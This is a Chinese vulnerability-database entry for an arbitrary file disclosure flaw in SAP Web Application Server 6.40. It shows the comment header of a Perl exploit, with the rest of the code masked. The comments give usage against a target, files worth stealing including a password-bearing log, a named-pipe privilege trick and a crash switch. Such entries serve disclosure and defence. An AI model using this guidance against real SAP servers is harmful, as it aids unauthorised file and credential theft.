SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit

基本字段

漏洞编号:
SSV-6171
披露/发现时间:
未知
提交时间:
2007-02-09
漏洞等级:
漏洞类别:
信息泄漏
影响组件:
SAP
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.05KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/perl -w
##
## SAP \\\'enserver.exe\\\' file downloader
## Tested on \\\"SAP Web Application Server Java 6.40\\\" (eval DVD)
## Found & coded by Nicob
##
## The downloaded file is limited to the first 32 kilobytes
## Usual port : TCP/3200+SYSNR
## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 \\\"c:\\\\boot.ini\\\"
##
## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
## \\\"\\\\\\\\your_box\\\\pipe\\\\your_pipe\\\" => get Local Admin (SAPServiceJ2E)
## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
##
## File parameter :
## C:\boot.ini
##  \\\\10.11.12.13shareimage.jpg
## ............Documents and SettingsAll UsersApplication Datasapdbwahttpreq.log (contains passwords !)
##
# Init
use strict;
use IO::Socket;
my $verbose = 0;
# Set this to anything not null to crash the process
my $crash = \\\"\\\";
my $socket;
my $reply;
$|=1;
# Get arguments
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1230
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负